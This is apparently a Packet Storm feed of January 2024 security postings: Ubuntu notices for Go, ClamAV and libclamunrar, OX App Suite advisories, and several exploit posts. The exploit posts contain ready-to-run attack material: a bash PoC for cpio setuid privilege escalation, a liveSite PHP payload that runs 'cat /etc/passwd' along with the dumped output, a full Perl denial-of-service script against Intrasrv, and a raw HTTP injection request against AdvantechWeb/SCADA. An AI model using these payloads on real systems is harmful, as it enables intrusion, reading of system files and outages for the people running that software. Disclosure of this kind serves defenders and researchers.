Ubuntu Security Notice 6038-2 - USN-6038-1 fixed several vulnerabilities in Go 1.18. This update provides the corresponding updates for Go 1.13 and Go 1.16. CVE-2022-29526 and CVE-2022-30630 only affected Go 1.16. It was discovered that the Go net/http module incorrectly handled Transfer-Encoding headers in the HTTP/1 client. A remote attacker could possibly use this issue to perform an HTTP Request Smuggling attack.

    ==========================================================================Ubuntu Security Notice USN-6038-2January 09, 2024golang-1.13, golang-1.16 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS (Available with Ubuntu Pro)- Ubuntu 16.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in Go.Software Description:- golang-1.13: Go programming language compiler- golang-1.16: Go programming language compilerDetails:USN-6038-1 fixed several vulnerabilities in Go 1.18. This update providesthe corresponding updates for Go 1.13 and Go 1.16.CVE-2022-29526 and CVE-2022-30630 only affected Go 1.16.Original advisory details:  It was discovered that the Go net/http module incorrectly handled  Transfer-Encoding headers in the HTTP/1 client. A remote attacker could  possibly use this issue to perform an HTTP Request Smuggling attack.  (CVE-2022-1705)  It was discovered that Go did not properly manage memory under certain  circumstances. An attacker could possibly use this issue to cause a panic  resulting into a denial of service. (CVE-2022-1962, CVE-2022-27664,  CVE-2022-28131, CVE-2022-30630, CVE-2022-30631, CVE-2022-30632,  CVE-2022-30633, CVE-2022-30635, CVE-2022-32189, CVE-2022-41715,  CVE-2022-41717, CVE-2023-24534, CVE-2023-24537)  It was discovered that Go did not properly implemented the maximum size of  file headers in Reader.Read. An attacker could possibly use this issue to  cause a panic resulting into a denial of service. (CVE-2022-2879)  It was discovered that the Go net/http module incorrectly handled query  parameters in requests forwarded by ReverseProxy. A remote attacker could  possibly use this issue to perform an HTTP Query Parameter Smuggling attack.  (CVE-2022-2880)  It was discovered that Go did not properly manage the permissions for  Faccessat function. A attacker could possibly use this issue to expose  sensitive information. (CVE-2022-29526)  It was discovered that Go did not properly generate the values for  ticket_age_add in session tickets. An attacker could possibly use this  issue to observe TLS handshakes to correlate successive connections by  comparing ticket ages during session resumption. (CVE-2022-30629)  It was discovered that Go did not properly manage client IP addresses in  net/http. An attacker could possibly use this issue to cause ReverseProxy  to set the client IP as the value of the X-Forwarded-For header.  (CVE-2022-32148)  It was discovered that Go did not properly validate backticks (`) as  Javascript string delimiters, and do not escape them as expected. An  attacker could possibly use this issue to inject arbitrary Javascript code  into the Go template. (CVE-2023-24538)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   golang-1.13                     1.13.8-1ubuntu2.22.04.2   golang-1.13-go                  1.13.8-1ubuntu2.22.04.2   golang-1.13-src                 1.13.8-1ubuntu2.22.04.2Ubuntu 20.04 LTS:   golang-1.13                     1.13.8-1ubuntu1.2   golang-1.13-go                  1.13.8-1ubuntu1.2   golang-1.13-src                 1.13.8-1ubuntu1.2   golang-1.16                     1.16.2-0ubuntu1~20.04.1   golang-1.16-go                  1.16.2-0ubuntu1~20.04.1   golang-1.16-src                 1.16.2-0ubuntu1~20.04.1Ubuntu 18.04 LTS (Available with Ubuntu Pro):   golang-1.13                     1.13.8-1ubuntu1~18.04.4+esm1   golang-1.13-go                  1.13.8-1ubuntu1~18.04.4+esm1   golang-1.13-src                 1.13.8-1ubuntu1~18.04.4+esm1   golang-1.16                     1.16.2-0ubuntu1~18.04.2+esm1   golang-1.16-go                  1.16.2-0ubuntu1~18.04.2+esm1   golang-1.16-src                 1.16.2-0ubuntu1~18.04.2+esm1Ubuntu 16.04 LTS (Available with Ubuntu Pro):   golang-1.13                     1.13.8-1ubuntu1~16.04.3+esm3   golang-1.13-go                  1.13.8-1ubuntu1~16.04.3+esm3   golang-1.13-src                 1.13.8-1ubuntu1~16.04.3+esm3In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6038-2   https://ubuntu.com/security/notices/USN-6038-1   CVE-2022-1705, CVE-2022-27664, CVE-2022-28131, CVE-2022-2879,   CVE-2022-2880, CVE-2022-29526, CVE-2022-30629, CVE-2022-30630,   CVE-2022-30631, CVE-2022-30632, CVE-2022-30633, CVE-2022-30635,   CVE-2022-32148, CVE-2022-32189, CVE-2022-41717, CVE-2023-24534,   CVE-2023-24537, CVE-2023-24538Package Information:https://launchpad.net/ubuntu/+source/golang-1.13/1.13.8-1ubuntu2.22.04.2https://launchpad.net/ubuntu/+source/golang-1.13/1.13.8-1ubuntu1.2https://launchpad.net/ubuntu/+source/golang-1.16/1.16.2-0ubuntu1~20.04.1

Ubuntu Security Notice USN-6038-2

cpio version 2.13 suffers from a privilege escalation vulnerability via setuid files in a cpio archive.

    cpio privilege escalation vulnerability via setuid files in cpio archiveHappy New Year, let in 2024 happiness be with you! :)When extracting archives cpio (at least version 2.13) preservesthe setuid flag, which might lead to privilege escalation.One example is r00t extracts to /tmp/ and scidiot runs /tmp/micq/backd00rwithout further interaction from root.We believe this is vulnerability, since directory traversal in cpiois considered vulnerability.The POC is trivial, including bash script.<pre>====#!/bin/bash# cpio privilege escalation via setuid files in cpio archive# author: Georgi Guninski# date: Mon Jan  8 07:28:28 AM UTC 2024# tested on cpio (GNU cpio) 2.13mkdir -p /tmp/1cd /tmp/1touch achmod 4555 aecho -n a | cpio -ocv0  > a.cpiomkdir -p /tmp/2cd /tmp/2cpio -iv < ../1/a.cpiols -lh /tmp/2/a#-r-sr-xr-x. 1 joro joro 0 Jan  8 09:10 /tmp/2/a====</pre>

cpio 2.13 Privilege Escalation

Ubuntu Security Notice 6568-1 - The ClamAV package was updated to a new upstream version to remain compatible with signature database downloads.

==========================================================================  
Ubuntu Security Notice USN-6568-1  
January 08, 2024

clamav update  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

ClamAV was updated to remain compatible with signature database downloads.

Software Description:  
- clamav: Anti-virus utility for Unix

Details:

The ClamAV package was updated to a new upstream version to remain  
compatible with signature database downloads.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   clamav                          1.0.4+dfsg-0ubuntu0.23.10.1

Ubuntu 23.04:  
   clamav                          0.103.11+dfsg-0ubuntu0.23.04.1

Ubuntu 22.04 LTS:  
   clamav                          0.103.11+dfsg-0ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
   clamav                          0.103.11+dfsg-0ubuntu0.20.04.1

This update uses a new upstream release, which includes additional bug  
fixes. In general, a standard system update will make all the necessary  
changes.

References:  
   https://ubuntu.com/security/notices/USN-6568-1  
   https://launchpad.net/bugs/2046581

Package Information:  
   https://launchpad.net/ubuntu/+source/clamav/1.0.4+dfsg-0ubuntu0.23.10.1  
   https://launchpad.net/ubuntu/+source/clamav/0.103.11+dfsg-0ubuntu0.23.04.1  
   https://launchpad.net/ubuntu/+source/clamav/0.103.11+dfsg-0ubuntu0.22.04.1  
   https://launchpad.net/ubuntu/+source/clamav/0.103.11+dfsg-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6568-1

SSH-Snake is a powerful tool designed to perform automatic network traversal using SSH private keys discovered on systems, with the objective of creating a comprehensive map of a network and its dependencies, identifying to what extent a network can be compromised using SSH and SSH private keys starting from a particular system. SSH-Snake can automatically reveal the relationship between systems which are connected via SSH, which would normally take a tremendous amount of time and effort to perform manually.suffers from bypass and traversal vulnerabilities.

SSH-Snake: Automated SSH-Based Network Traversal

OX App Suite version 7.10.6-rev51 suffers from an access control vulnerability. Version 7.10.6-rev34 suffers from multiple cross site scripting vulnerabilities.

Internal reference: MWB-2315  
Type: CWE-284 (Improper Access Control)  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by vendor  
Last affected revision: OX App Suite backend 7.10.6-rev51, OX App Suite backend 8.17  
First fixed revision: OX App Suite backend 7.10.6-rev52, OX App Suite backend 8.18  
Discovery date: 2023-09-21  
Solution date: 2023-09-24  
Disclosure date: 2023-09-25  
CVE: CVE-2023-29051  
CVSS: 8.1 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)

Details:  
User-defined templates can bypass access control. User-defined OXMF templates could be used to access a limited part of the internal OX App Suite Java API. The existing switch to disable the feature by default was not effective in this case.

Risk:  
Unauthorized users could discover and modify application state, including objects related to other users and contexts. No publicly available exploits are known.

Solution:  
We now make sure that the switch to disable user-generated templates by default works as intended and will remove the feature in future generations of the product.

---

Internal reference: OXUIB-2532  
Type: CWE-79 (Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'))  
Component: frontend  
Report confidence: Confirmed  
Solution status: Fixed by vendor  
Last affected revision: OX App Suite frontend 7.10.6-rev34  
First fixed revision: OX App Suite frontend 7.10.6-rev35  
Discovery date: 2023-09-07  
Solution date: 2023-09-24  
Disclosure date: 2023-09-25  
CVE: CVE-2023-29052  
CVSS: 5.4 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)

Details:  
XSS in upsell portal widget (shop disclaimer). Users were able to define disclaimer texts for an upsell shop dialog that would contain script code that was not sanitized correctly.

Risk:  
Attackers could lure victims to user accounts with malicious script code and make them execute it in the context of a trusted domain. No publicly available exploits are known.

Solution:  
We added sanitization for this content.

---

Internal reference: OXUIB-2533  
Type: CWE-79 (Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'))  
Component: frontend  
Report confidence: Confirmed  
Solution status: Fixed by vendor  
Last affected revision: OX App Suite frontend 7.10.6-rev34  
First fixed revision: OX App Suite frontend 7.10.6-rev35  
Discovery date: 2023-09-07  
Solution date: 2023-09-24  
Disclosure date: 2023-09-25  
CVE: CVE-2023-41710  
CVSS: 5.4 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)

Details:  
XSS in upsell portal widget (shop URL). User-defined script code could be stored for a upsell related shop URL. This code was not correctly sanitized when adding it to DOM.

Risk:  
Attackers could lure victims to user accounts with malicious script code and make them execute it in the context of a trusted domain. No publicly available exploits are known.

Solution:  
We added sanitization for this content.

OX App Suite 7.10.6 Access Control / Cross Site Scripting

OX App Suite version 7.10.6-rev50 suffers from remote code execution and LDAP injection vulnerabilities. Version 7.10.6-rev33 suffers from a cross site scripting vulnerability.

Internal reference: MWB-2261  
Type: CWE-78 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'))  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by vendor  
Last affected revision: OX App Suite backend 7.10.6-rev50  
First fixed revision: OX App Suite backend 7.10.6-rev51  
Discovery date: 2023-08-08  
Solution date: 2023-09-14  
Disclosure date: 2023-09-19  
CVE: CVE-2023-29048  
CVSS: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

Details:  
OXMF templates allow remote code execution. A component for parsing OXMF templates could be abused to execute arbitrary system commands that would be executed as the non-privileged runtime user.

Risk:  
Users and attackers could run system commands with limited privilege to gain unauthorized access to confidential information and potentially violate integrity by modifying resources. No publicly available exploits are known.

Solution:  
The template engine has been reconfigured to deny execution of harmful commands on a system level.

---

Internal reference: MWB-2274  
Type: CWE-90 (Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection'))  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by vendor  
Last affected revision: OX App Suite backend 7.10.6-rev50, OX App Suite backend 8.16  
First fixed revision: OX App Suite backend 7.10.6-rev51, OX App Suite backend 8.17  
Discovery date: 2023-08-17  
Solution date: 2023-09-18  
Disclosure date: 2023-09-19  
CVE: CVE-2023-29050  
CVSS: 7.6 (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L)

Details:  
LDAP filter injection vulnerability in Contacts Provider LDAP. The optional "LDAP contacts provider" could be abused by privileged users to inject LDAP filter strings that allow to access content outside of the intended hierarchy.

Risk:  
Unauthorized users could break confidentiality of information in the directory and potentially cause high load on the directory server, leading to denial of service. No publicly available exploits are known.

Solution:  
Encoding has been added for user-provided fragments that are used when constructing the LDAP query.

---

Internal reference: OXUIB-2489  
Type: CWE-79 (Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'))  
Component: frontend  
Report confidence: Confirmed  
Solution status: Fixed by vendor  
Last affected revision: OX App Suite frontend 7.10.6-rev33  
First fixed revision: OX App Suite frontend 7.10.6-rev34  
Discovery date: 2023-08-14  
Solution date: 2023-09-18  
Disclosure date: 2023-09-19  
CVE: CVE-2023-29049  
CVSS: 5.4 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)

Details:  
XSS in upsell portal widget. The "upsell" widget at the portal page could be abused to inject arbitrary script code.

Risk:  
Attackers that manage to lure users to a compromised account, or gain temporary access to a legitimate account, could inject script code to gain persistent code execution capabilities under a trusted domain. No publicly available exploits are known.

Solution:  
User input for this widget is now sanitized to avoid malicious content the be processed.

OX App Suite 7.10.6 XSS / Command Execution / LDAP Injection

liveSite version 2019.1 suffers from a remote code execution vulnerability.

    ## Exploit Title: liveSite Version : 2019.1  Remote Code Execution### Date: 2024-1-9### Exploit Author: tmrswrr### Category: Webapps### Vendor Homepage: https://livesite.com/### Version : 2019.1### Tested on: https://www.softaculous.com/apps/cms/liveSite1 ) Login with admin cred Click Staff Home  >  Edit > Designer Region Name:megamenu , write in HTML Code Snippet your payload : https://127.0.0.1/liveSite/livesite/edit_designer_region.php?id=193&send_to=%2FliveSite%2Fstaff-home     Payload : <?php echo system('cat /etc/passwd'); ?>2 ) After save you will be see result : http://127.0.0.1/liveSite/staff-home    Result: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:998:997:User for polkitd:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:997:995::/var/lib/chrony:/sbin/nologin soft:x:1000:1000::/home/soft:/sbin/nologin saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin emps:x:995:1001::/home/emps:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin vmail:x:5000:5000::/var/local/vmail:/bin/bash pinguzo:x:992:992::/etc/pinguzo:/bin/false webuzo:x:987:987::/home/webuzo:/bin/bash apache:x:986:985::/home/apache:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false

liveSite 2019.1 Remote Code Execution

Intrasrv Simple Web Server version 1.0 suffers from a denial of service vulnerability.

#!/usr/bin/perl

use IO::Socket;

# Exploit Title: Intrasrv Simple Web Server 1.0 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 09 january 2024  
# Vendor Homepage: http://www.leighb.com/intrasrv.htm  
# Download to demo: http://www.leighb.com/intrasrv.zip  
# Download 2 to demo: https://drive.google.com/file/d/1HuUGIGMp_L6viM-j6djGICsyxZg_SJtB/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Intrasrv Simple Web Server 1.0  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=9u77LwLgXzU  
# Vídeo 2: https://drive.google.com/file/d/1GDVpLx5YfWdhI3ZQcG5P0EWvuR25SEjW/view?usp=sharing

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data via method GET to web server.  
#The following request sends a large amount of data to the web server to process across method GET, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    my $sis="$^O";  
    our $cmd;

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

my $buffer1 = "\x41"x4674;

my $buffer2 = "\x41" x 638;

my $buffer = "GET / HTTP/1.1\r\n";  
$buffer .= "Host: " . $buffer1 . "\r\n";  
$buffer .= "User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n";  
$buffer .= $buffer2;

my $one = IO::Socket::INET->new(  
    PeerAddr => $ip,  
    PeerPort => $port,  
    Proto    => 'tcp',  
) or die "Could not connect to $ip: $!\n";

print $one $buffer;  
close $one;

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "********************************************************\n";  
      print "*  Intrasrv Simple Web Server 1.0 - Denied of Service  *\n";  
      print "*                                                      *\n";  
      print "*            Coded by Fernando Mengali                 *\n";  
      print "*                                                      *\n";  
      print "*      e-mail: fernando.mengalli\@gmail.com             *\n";  
      print "*                                                      *\n";  
      print "*******************************************************\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

Intrasrv Simple Web Server 1.0 Denial Of Service

AdvantechWeb/SCADA version 9.1.5U suffers from a post authentication remote SQL injection vulnerability.

    ;; PostAuth SQLi in AdvantechWeb/SCADA 9.1.5U;; ;; found: 28.12.2023;;;; more: ;;   https://code610.blogspot.com/2024/01/postauth-sqli-in-advantechwebscada-915u.html;; POST /waconfig/api/odbc/getSystemLog HTTP/2Host: 192.168.56.106Cookie: serverLanguage=en; csrfToken=a2db29e5-68f5-4cae-917c-41767ee92911-1837; pcname=MSEDGEWIN10; rpcPort=4592; accessCode=qweqwe; socketPort=14592; account=admin; ASPSESSIONIDQWBDCRDA=MCKNMBPCPEFMMGDHFCIICAGA; ASPSESSIONIDQSBDCRDA=NCKNMBPCOGIENOGNONBOFBFF; ASP.NET_SessionId=zgqgjalvaa0x1kpcdj3ke2di; user=name=; ASPSESSIONIDCGTAATDA=OCEJBDPCJIJLPKAFFGOGHPANUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Accept: application/json, text/plain, */*Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/json;charset=utf-8Content-Length: 359Origin: https://192.168.56.106Referer: https://192.168.56.106/waconfig/indexSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: keep-alive{"csrfToken":"a2db29e5-68f5-4cae-917c-41767ee92911-1837","StartDateTime":"12/28/2023 00:00:00","EndDateTime":"12/28/2023 22:20:46","Action":[2,3,4,5,6,7,8,9,10,11,13,14,15,16,12],"UserName":"ALL","IPAddress":"ALL","NodeName":"ALL","ProjName":"ALL","Orders":[{"ColumnName":"%27>%22><svg/onload=prompt(123)>","descending":"DESC"}],"PageSize":50,"CurrentPage":1}resp:HTTP/2 200 OKCache-Control: no-cachePragma: no-cacheContent-Length: 225Content-Type: application/json; charset=utf-8Expires: -1Server: Microsoft-IIS/10.0X-Ua-Compatible: IE=EmulateIE7Access-Control-Allow-Origin: http://localhost:8080Access-Control-Allow-Methods: GET,POST,OPTIONSAccess-Control-Allow-Headers: Content-TypeAccess-Control-Allow-Credentials: trueStrict-Transport-Security: max-age=31536000;includeSubDomains;preloadX-Content-Type-Options: nosniffDate: Thu, 28 Dec 2023 21:29:56 GMT{"error":-500,"reason":"Exception captured by WebApiExceptionFilter: ERROR [42000] [Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression \u0027%27\u003e%22\u003e\u003csvg/onload=prompt(123)\u003e\u0027."} ;; cheers;;

AdvantechWeb/SCADA 9.1.5U SQL Injection

Ubuntu Security Notice 6569-1 - it was discovered that libclamunrar incorrectly handled directories when extracting RAR archives. A remote attacker could possibly use this issue to overwrite arbitrary files and execute arbitrary code. This issue only affected Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 23.04. It was discovered that libclamunrar incorrectly validated certain structures when extracting RAR archives. A remote attacker could possibly use this issue to execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6569-1  
January 08, 2024

libclamunrar vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in libclamunrar.

Software Description:  
- libclamunrar: anti-virus utility for Unix - unrar support

Details:

it was discovered that libclamunrar incorrectly handled directories when  
extracting RAR archives. A remote attacker could possibly use this issue to  
overwrite arbitrary files and execute arbitrary code. This issue only  
affected Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 23.04.  
(CVE-2022-30333)

It was discovered that libclamunrar incorrectly validated certain  
structures when extracting RAR archives. A remote attacker could possibly  
use this issue to execute arbitrary code. (CVE-2023-40477)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   libclamunrar11                  1.0.4-0ubuntu0.23.10.1

Ubuntu 23.04:  
   libclamunrar9                   0.103.11-0ubuntu0.23.04.1

Ubuntu 22.04 LTS:  
   libclamunrar9                   0.103.11-0ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
   libclamunrar9                   0.103.11-0ubuntu0.20.04.1

This update uses a new upstream release, which includes additional bug  
fixes. In general, a standard system update will make all the necessary  
changes.

References:  
   https://ubuntu.com/security/notices/USN-6569-1  
   CVE-2022-30333, CVE-2023-40477

Package Information:  
   https://launchpad.net/ubuntu/+source/libclamunrar/1.0.4-0ubuntu0.23.10.1  
   https://launchpad.net/ubuntu/+source/libclamunrar/0.103.11-0ubuntu0.23.04.1  
   https://launchpad.net/ubuntu/+source/libclamunrar/0.103.11-0ubuntu0.22.04.1  
   https://launchpad.net/ubuntu/+source/libclamunrar/0.103.11-0ubuntu0.20.04.1

Source

Packet Storm